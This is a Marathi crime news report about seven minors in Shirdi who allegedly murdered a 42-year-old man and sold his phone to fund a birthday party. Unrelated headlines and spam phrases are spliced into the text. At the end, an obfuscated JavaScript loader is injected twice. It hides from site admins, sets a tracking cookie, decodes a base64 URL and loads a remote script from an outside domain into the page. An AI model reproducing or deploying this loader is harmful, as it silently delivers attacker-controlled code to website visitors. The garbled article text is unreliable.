SHIRDI CRIME: साईनगरी बनली गुन्हेनगरी! आधी खून मग बर्थडे पार्टी; शिर्डीत अल्पवयीन टोळक्याचा राडा
SHIRDI CRIME: राज्यातील आणि देशातील भाविकांचं श्रद्धास्थान असलेल्या श्री संस्थान शिर्डीमध्ये गुन्हेगारीचं प्रमाण वाढलंय. त्यातच अल्पवयीन मुलांच्या टोळक्याने बर्थडे पार्टी सेलिब्रेट
करण्यासाठी चक्क एक खून केल्याचं उघडकीस आलंय. यामध्ये 42 वर्षे व्यक्तीचा नाहक बळी गेलाय. त्यामुळेच शिर्डीतील
या बर्थडे पार्टीची चर्चा राज्यभरात होत आहेत. bickett real name Harlow Flower Foot GoddessTOP NEWS MARATHI | YAVATMAL CRIME NEWS: यवतमाळमध्ये भर रस्त्यात लहान भावाने मोठ्या भावाला संपवलं
कोपरगाव तालुक्यातील हांडेवाडी परिसरात वास्तव्यास असलेले 42 वर्षीय
गणेश सखाहरी चत्तर हे आठ जून पासून बेपत्ता होते.
त्यांच्या शोधासाठी पोलिसांची पथकं काम करत असताना
शिर्डी जवळील नांदुर्खी बुद्रुक येथे
BEED CRIME CASE: 5 लाख द्या, अन्यथा…बीडमध्ये संस्थाचालकाला धमकी;नेमकं प्रकरण काय ?
एका शेतात अज्ञात व्यक्तीचा मृतदेह आढळून आला.
पोलिस ठाण्यात या व्यक्तीच्या अकस्मात मृत्यूची नोंद (SHIRDI CRIME) करण्यात आली होती.
मात्र मृतदेहाची ओळख पटवताना हा मृतदेह चत्तर यांचाच असल्याचं निष्पन्न झालं.
चत्तर यांच्या मृतदेहावर अनेक गंभीर जखमा होत्या.
त्यामुळे त्यांचं घातपात झाल्याची शक्यता होती.
त्या दृष्टिकोनातून पोलिसांनी तपास सुरू केला.
तपासादरम्यान चत्तर यांचा फोन
एका अल्पवयीन मुलाकडे असल्याचं तांत्रिक तपासातून निष्पन्न झालं आणि त्यांच्या हत्येचं कोडं उलगडलं.
गणेश चत्तर हे रात्रीच्या वेळी पायी जात असताना
अल्पवयीन मुलांच्या टोळक्याने त्यांचं अपहरण केलं.
दारूच्या नशेत असलेल्या मुलांनी आधी त्यांना लाथा बुक्क्या मारल्या, तर नंतर काठी आणि उसाने मारहाण केली.
त्यांच्या खिशातला मोबाईल काढून घेतला आणि गळा दाबून धारदार चाकूने त्यांच्यावर वार केले.
नंतर त्यांचा मृतदेह उसाच्या शेतात फेकून दिला आणि मोबाईल घेऊन हे चोरटे पसार झाले.
या अल्पवयीन गुन्हेगारांनी हाच मोबाईल साडेचार हजारांना एका दुकानदाराला विकला.
त्यातून मिळालेल्या पैशातून बर्थडे पार्टी केली.
नंतर तोच विकलेला मोबाईल आरोपींपैकी एकाने विकत घेतला. तो मोबाईल चालू केल्यानंतर
आयपी ऍड्रेस वरून मोबाईलचं लोकेशन ट्रॅक करण्यात आलं
आणि त्या आधारेच पोलीस या आरोपींपर्यंत पोहोचले.
या प्रकरणात एकूण सात आरोपी असून हे सर्व आरोपी अल्पवयीन असल्याची माहिती समोर आली आहे.
या आरोपींनी आपण बर्थडे पार्टी सेलिब्रेट करण्यासाठी पैसे हवे होते
याच कारणाने चत्तर यांचं अपहरण करून त्यांना लुटल्याची आणि नंतर खून केल्याचीही कबुली दिली आहे.
ही हत्या करताना आरोपी दारूच्या नशेत होते.
त्यांच्याकडे दारूच्या बाटल्या देखील होत्या, असं तपासातून समोर आलंय.
आरोपी सध्या पोलिसांच्या ताब्यात असून जरी आरोपी अल्पवयीन असले तरीही गुन्हा अतिशय गंभीर असल्याने
त्यांच्यावर कठोरातील कठोर कारवाई करण्याची मागणी करण्यात येत आहे.
दरम्यान शिर्डीत काही दिवसांपूर्वी देखील रस्त्यावर झोपलेल्या व्यक्तीची पैशांसाठी हत्या करण्यात आली होती.
त्यामुळे साईनगरी गुन्हेनगरी होत आहे का असा प्रश्न सामान्य जनतेकडून उपस्थित केला जातोय.(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9+/=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9+/=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();
